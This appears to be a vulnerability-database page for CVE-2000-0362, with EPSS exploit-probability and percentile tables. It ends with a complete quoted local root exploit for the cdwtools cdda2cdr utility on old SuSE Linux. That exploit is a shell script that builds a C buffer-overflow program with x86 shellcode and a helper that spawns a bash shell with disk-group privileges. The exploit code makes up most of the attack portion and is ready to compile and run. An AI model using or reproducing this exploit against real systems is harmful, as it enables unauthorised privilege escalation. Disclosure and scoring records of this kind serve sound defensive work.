CVE-2000-0362 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.76%	–	–
2022-03-27	–	–	1.76%	–	–
2022-04-03	–	–	1.76%	–	–
2022-04-17	–	–	1.76%	–	–
2022-08-28	–	–	1.76%	–	–
2023-03-05	–	–	1.76%	–	–
2023-03-12	–	–	–	0.04%	–
2024-06-02	–	–	–	0.04%	–
2025-01-19	–	–	–	0.04%	–
2025-03-18	–	–	–	–	0.15%
2025-04-15	–	–	–	–	0.15%
2025-04-15	–	–	–	–	0.15,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	54%
2022-03-27	55%
2022-04-03	74%
2022-04-17	75%
2022-08-28	76%
2023-03-05	77%
2023-03-12	–
2024-06-02	–
2025-01-19	–
2025-03-18	32%
2025-04-15	36%
2025-04-15	36%

#!/bin/sh #source: https://www.securityfocus.com/bid/738/info # #cdwtools is a package of utilities for cd-writing. The linux version of these utilities, which ships with S.u.S.E linux 6.1 and 6.2, is vulnerable to several local root #compromises. It is known that there are a number of ways to exploit these packages, including buffer overflows and /tmp symlink attacks. # #--- cdda2x.sh --- #!/bin/sh # # Shell script for Linux x86 cdda2cdr exploit # Brock Tellier btellier@usa.net # cat > /tmp/cdda2x.c <<EOF /** ** Linux x86 exploit for /usr/bin/cdda2cdr (sgid disk on some Linux distros) ** gcc -o cdda2x cdda2x.c; cdda2x <offset> <bufsiz> ** ** Brock Tellier btellier@usa.net **/ #include <stdlib.h> #include <stdio.h> char exec[]= /* Generic Linux x86 running our /tmp program */ "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/cd"; #define LEN 500 #define NOP 0x90 unsigned long get_sp(void) { __asm__("movl %esp, %eax"); } void main(int argc, char *argv[]) { int offset=0; int i; int buflen = LEN; long int addr; char buf[LEN]; if(argc > 3) { fprintf(stderr, "Error: Usage: %s offset buffer\n", argv[0]); exit(0); } else if (argc == 2){ offset=atoi(argv[1]); } else if (argc == 3) { offset=atoi(argv[1]); buflen=atoi(argv[2]); } else { offset=500; buflen=500; } addr=get_sp(); fprintf(stderr, "Linux x86 cdda2cdr local disk exploit\n"); fprintf(stderr, "Brock Tellier btellier@usa.net\n"); fprintf(stderr, "Using addr: 0x%x\n", addr+offset); memset(buf,NOP,buflen); memcpy(buf+(buflen/2),exec,strlen(exec)); for(i=((buflen/2) + strlen(exec))+1;i<buflen-4;i+=4) *(int *)&buf[i]=addr+offset; execl("/usr/bin/cdda2cdr", "cdda2cdr", "-D", buf, NULL); /* for (i=0; i < strlen(buf); i++) putchar(buf[i]); */ } EOF cat > /tmp/cd.c <<EOF void main() { setregid(getegid(), getegid()); system("/bin/bash"); } EOF gcc -o /tmp/cd /tmp/cd.c gcc -o /tmp/cdda2x /tmp/cdda2x.c echo "Note that gid=6 leads to easy root access.." /tmp/cdda2x